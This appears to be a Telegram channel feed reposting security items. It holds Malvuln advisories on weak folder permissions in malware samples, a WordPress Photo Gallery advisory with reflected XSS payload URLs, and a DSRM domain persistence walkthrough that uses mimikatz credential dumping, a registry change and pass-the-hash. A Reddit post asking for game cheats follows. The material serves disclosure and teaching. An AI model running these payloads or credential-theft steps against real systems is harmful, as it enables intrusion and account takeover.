Hacking Articles Tips Tricks Videos Tutorials
469 subscribers
66.2K photos
15 videos
157 files
133K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.Agentb.iofv Insecure Permissions

https://4.bp.blogspot.com/-khon6dqGLkI/WWlvkVAr7qI/AAAAAAAAIQw/JwPgE9u6PkcV9AqklLFI3rOjfEX9YXC4QCLcBGAs/s1600/h96.png
Trojan.Win32.Agentb.iofv malware suffers from an insecure permissions vulnerability.

MD5 | f1d4908479b404b3600bb16933d6ba56

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/d4ac133a9df0c627f899bb6039d04215.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.Agentb.iofv
Vulnerability: Insecure Permissions
Description: Agentb.iofv creates an insecure dir named "drivr" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges
Type: PE32
MD5: d4ac133a9df0c627f899bb6039d04215
Vuln ID: MVID-2021-0172
Dropped files: hostloader.exe
Disclosure: 04/17/2021

Exploit/PoC:
C:\>cacls drivr
C:\drivr BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\>dir /a drivr
Volume in drive C has no label.

Directory of C:\drivr

06/14/2012 06:21 PM 293,376 hostloader.exe
1 File(s) 293,376 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.NanoBot.onh Insecure Permissions

https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
Trojan.Win32.NanoBot.onh malware suffers from an insecure permissions vulnerability.

MD5 | 547ee0ff71365297633d647614914aa7

Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/9fff4c02274c0162880844f27ff91407.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.NanoBot.onh
Vulnerability: Insecure Permissions
Description: NanoBot.onh creates an insecure dir named "AppData" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. In this case the dropped file "amsiproxy.bat" is actually an PE32 executable as indicated by the presence of MZ header field and binary data.
Type: PE32
MD5: 9fff4c02274c0162880844f27ff91407
Vuln ID: MVID-2021-0173
Dropped files: amsiproxy.bat (PE32)
Disclosure: 04/17/2021

Exploit/PoC:
C:\>cacls AppData
C:\AppData BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\AppData\Register-CimProvider>dir
Volume in drive C has no label.

Directory of C:\AppData\Register-CimProvider

04/15/2021 10:50 PM 1,101,316 amsiproxy.bat
1 File(s) 1,101,316 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
xscreensaver Raw Socket Leak

https://1.bp.blogspot.com/-f08tQl4ET7w/WWlvRxSI6FI/AAAAAAAAINU/PQjq5zhIC6AFgb3OPDnJIpwa9KgUsaunwCLcBGAs/s1600/h37.png
xscreensaver suffers from a raw socket leak vulnerability. Proof of concept exploit demonstrates running tcpdump via this issue.

MD5 | 48106b83c9aba927ebf03a5ccbadc196

Download
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Dropper.Win32.Agent.bjtzcp Insecure Permissions

https://3.bp.blogspot.com/-Q0zmt52Iz_s/WWlvCi1SqRI/AAAAAAAAIKo/56GGQ_7zLBsvaLtYw9wmjI_Jb6z2oza2QCLcBGAs/s1600/h129.png Trojan-Dropper.Win32.Agent.bjtzcp malware suffers from an insecure permissions vulnerability.

MD5 | ebf9feb12cbe5962ffa0a0a27208784fDownload Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/2992b86d03c3922ed45fa09ef105f018.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan-Dropper.Win32.Agent.bjtzcp
Vulnerability: Insecure Permissions
Description: Agent.bjtzcp creates an insecure dir named "Isrimss2018" under c:\ drive and grants change (C) permissions to the authenticated user group. Standard users can rename the executables dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Type: PE32
MD5: 2992b86d03c3922ed45fa09ef105f018
Vuln ID: MVID-2021-0174
Disclosure: 04/17/2021

Exploit/PoC:
C:\>cacls Isrimss2018
C:\Isrimss2018 BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
C:\>dir Isrimss2018
Volume in drive C has no label.

Directory of C:\Isrimss2018

12/30/2017 02:13 PM 108,544 Copia.mdb
12/12/2017 07:45 PM 112,640 DatosP.mdb
12/30/2017 02:13 PM 102,400 DatosPatron.mdb
01/20/2015 11:58 PM 37,888 Doc1F.doc
01/20/2015 11:59 PM 37,376 Doc1M.doc
01/20/2015 11:44 PM 37,888 Doc2F.doc
01/20/2015 11:45 PM 36,864 Doc2M.doc
01/21/2015 12:06 AM 37,376 Doc3F.doc
01/21/2015 12:06 AM 36,352 Doc3M.doc
01/21/2015 12:03 AM 37,376 Doc4F.doc
01/21/2015 12:04 AM 36,864 Doc4M.doc
01/25/2015 11:19 PM 46,080 Doc5F.doc
01/20/2015 11:53 PM 38,400 Doc5M.doc
01/20/2015 11:36 PM 45,056 Doc6F.doc
01/24/2015 01:23 AM 38,400 Doc6M.doc
01/20/2015 11:40 PM 37,376 Doc7F.doc
01/20/2015 11:39 PM 38,400 Doc7M.doc
01/20/2015 11:47 PM 36,864 Doc8F.doc
01/20/2015 11:48 PM 36,352 Doc8M.doc
01/20/2015 11:50 PM 37,888 Doc9F.doc
01/20/2015 11:51 PM 36,864 Doc9M.doc
03/30/2005 11:03 PM 766 impuicon.ico
01/26/2018 07:33 PM 7,551,939 ISRIMSS2018_2.CAB
02/07/2018 10:08 PM 3,821,568 ISRIMSS2018_2.exe
12/26/2015 02:18 PM 71,168 MANUALITO.doc
03/26/1999 12:00 AM 141,824 setup.exe
01/27/2018 11:44 AM 7,446 SETUP.LST
27 File(s) 12,607,959 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packets[...]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
WordPress Photo Gallery 1.5.69 Cross Site Scripting

https://1.bp.blogspot.com/-gLNlUWq63_8/WWlvGRw0eoI/AAAAAAAAILQ/4OYXBaTeiPkRlDYcEes6gWLLrvO9LjoiQCLcBGAs/s1600/h138.png
WordPress Photo Gallery plugin versions 1.5.69 and below suffer from multiple reflective cross site scripting vulnerabilities.

MD5 | b5c0688f0cda1e2a8251928650a32477

Download
Researcher Name: ThuraMoeMyint
Twitter: https://twitter.com/mgthuramoemyint
Vendor Url: https://wordpress.org/plugins/photo-gallery/

"Photo Gallery by 10Web / Mobile-Friendly Image Gallery" (photo-gallery) Multiple RXSS

The parameter bwg_album_breadcrumb_0 is able to inject malicious javascript code.
Affected Version < 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{"id":"1'> ","page":1},{"id":"1","page":1}]&gallery_type=album_extended_preview

The parameter "shortcode_id" is able to inject malicious javascript.
Affected Version < 1.5.68

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=5&tag=0&album_id=0&theme_id=1&shortcode_id=9%22%20onmouseover=alert(id)//

The parameter "album_gallery_id_0" is able to inject malicious javascript.
Affected Version <=

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&album_gallery_id_0=%27);}%20alert(1);//

The parameter "bwg_album_search_0" is able to inject malicious javascript.
Affected Version <=

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_search_0=%22%20autofocus%20onfocus%3D%22alert(1)

The parameter "tag" is able to inject malicious javascript.
Affected Version <=

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&tag=%22%20onmouseover=alert(1)%3E

The parameter "type_0" is able to inject malicious javascript.
Affected Version <=

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&type_0=%27);}%20alert(document.domain);//

The parameter "theme_id" is able to inject malicious javascript.
Affected Version <=

vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&theme_id=%22%20onmouseover=alert(1)%3E

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Domain Persistence: DSRM Attack

In this post, we are going to discuss one more Mitre Attack Technique for Tactic ID TA0003 which is used by various of APTs & threat Actors for creating a permanent backdoor in the domain controller. We will check how to use Directory Services Restore Mode (DSRM) for conducting a persistence attacker on the Domain controller. Table of Content<o:pLab Setup Requirement<o:p

What is DSRM Password<o:p

· DSRM Persistence<o:p

· Extract the Hashes<o:p

· Change the DSRM Registry Key Value<o:p

Pass the DSRM Hash<o:p

Mitigation & Workaround Solution<o:p

<o:p Lab Setup Requirement<o:p· 1 Domain Server 2016 & mimikatz<o:p

· 1 Domain client & mimikatz<o:p Note: A domain controller contains two Administrator accounts, one “AD Administrator Account” use to login into the domain controller that is managed by LSASS and another is hard-coded “Local Administrator Account” stored in their SAM database.<o:pWhat is DSRM Password<o:pAll domain controllers have a hard-coded local Administrator account stored in their SAM file. This account and local database are not used or generally available when the domain controllers are running normally.<o:p

While Active Directory Domain Controller is configured, the wizard prompts ask to enter a DSRM password for the local administrator. This password provides the administrator with a back door to the database in case something goes wrong later.<o:p

<o:p DSRM Persistence<o:pDSRM persistence is possible where the systems do not change the DSRM password after AD installation or do not follow the standard of changing passwords regularly for DSRM.<o:p

<o:p https://1.bp.blogspot.com/-8ick8vixbS0/YH2EQe64B1I/AAAAAAAAvao/JSPa1vmSO44RBv70QAQpdC2cKamDeWCBQCLcBGAsYHQ/s16000/0.png <o:p

<o:p At Domain Controller<o:pAs per the cyber kill chain, persistence attack is a phase that comes after the initial foothold where an attacker will strive to create a permanent backdoor to establish a connection in the future. <o:p

Here, you can choose any of the methods to access the domain controller atleast once, then inject the mimikatz to obtain a password hash for a local Administrator account.<o:p Extract the Hashes<o:pIf you will observer the following image, you will notice that I have pulled out password hashes for Local Administrationfrom the SAMfile & AD Administratoraccount by injecting LSAinjection. <o:p

All you need to do is just run the mimikatz with Administration privilege and execute these commands given below:<o:p privilege::debug<o:ptoken::elevate<o:pExtract local Administrator Password Hash<o:p lsadump::sam <o:pExtract AD Administrator Password Hash <o:p lsadump::lsa /patch<o:pConclusion:I have two different hashes for each administrator account but we password hash for local administrator account.<o:p https://1.bp.blogspot.com/-mfSqratYT5s/YH2EUuK-x2I/AAAAAAAAvas/g0euOi56cds3VO03GL7Gw_9OgyboYUSQQCLcBGAsYHQ/s16000/1.png Change the DSRM Registry Key Value<o:pOnce you have the local administrator password hash you need to make some changes inside the Windows registry that will allow you (attacker) to login into Domain Controller using DSRM hashes without rebooting the server.<o:p

Very first confirm the registry key value for DsrmAdminLogonBehaviour with the help of the following command:<o:p

Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\"<o:p

Here, it shows DsrmAdminLogonBehaviour Value=0 that will not allow login into DC using DSRM hash.<o:p https://1.bp.blogspot.com/-eEj_ifyGJis/YH2EapIdVNI/AAAAAAAAvaw/ouKqat1zJ_IKeV-H6W4yb[...]
Hacking Articles Tips Tricks Videos Tutorials
Hacking Articles|Raj Chandel's Blog Domain Persistence: DSRM Attack In this post, we are going to discuss one more Mitre Attack Technique for Tactic ID TA0003 which is used by various of APTs & threat Actors for creating a permanent backdoor in the domain…
XWCRW09PZqCACLcBGAsYHQ/s16000/4.png Set DsrmAdminLogonBehaviour value=2with the help of the following command:<o:p

Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -Verbose<o:p https://1.bp.blogspot.com/-x_6m-F93yb4/YH2EfR8wkUI/AAAAAAAAva0/--PpMlQgD0wv-jpqKnGhBpX13XxSbrrwQCLcBGAsYHQ/s16000/5.png Note:If DsrmAdminLogonBehaviou registry key is not present inside the HKLM:\System\CurrentControlSet\Control\Lsa\ then create a new key and set the value with the help of the following command:<o:p

New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehaviour" -Value 2 -PropertyType DWORD -Verbose<o:p Conclusion:The DSRM persistence is now ready for use.<o:p

<o:p https://1.bp.blogspot.com/-AH4Qkoa1Y1A/YH2Ej8_VRQI/AAAAAAAAva8/Q5U7eUxjluYCAygW5ArV7-AP4UaKiEMBgCLcBGAsYHQ/s16000/7.png Pass the DSRM Hash<o:pAt Client System<o:pTo access the domain controller CMD through the client system, run mimikatz with administrator privilege and execute the following command:<o:p

privilege::debug<o:p

sekurlsa::pth /user:Administrator /domain:ignite.local /ntlm:32196B56FFE6F45E294117B91A83BF38<o:p Note: Use the hash value of the local Administrator in the above command <o:pThis will provide you (attacker) the Administrator privilege cmd shell of the Domain controller 😊 <o:p https://1.bp.blogspot.com/-cJknhi797bc/YH2En1JCN4I/AAAAAAAAvbE/DD5O9oURHLkxHhjFblIayUPoMi7pZRKSACLcBGAsYHQ/s16000/8.png <o:p Mitigation & Workaround Solution<o:p· Check & monitor the DsrmAdminLogonBehaviour value is not set to 2 inside the Registry key.<o:p

· DSRM passwords are changed regularly at least once a month.
hacking: security in practice
Requesting Guide

Understanding I cant ask " how do i start" I'm just looking to be pointed in the right direction for what I want - I play BF1 the servers I play on due to having best ping / best availability with players is just WRECKED with haxers so I'm asking for someone to give me advice/direction on where the best place to get hacks EASILY installed for that game would be - I'm not a haxer, never done it before , but I'm tired of having a 5 K and 45 D ratio, and closing the game in a rage and feeling like Ive been cheated.

submitted by /u/paridonian
[link] [comments]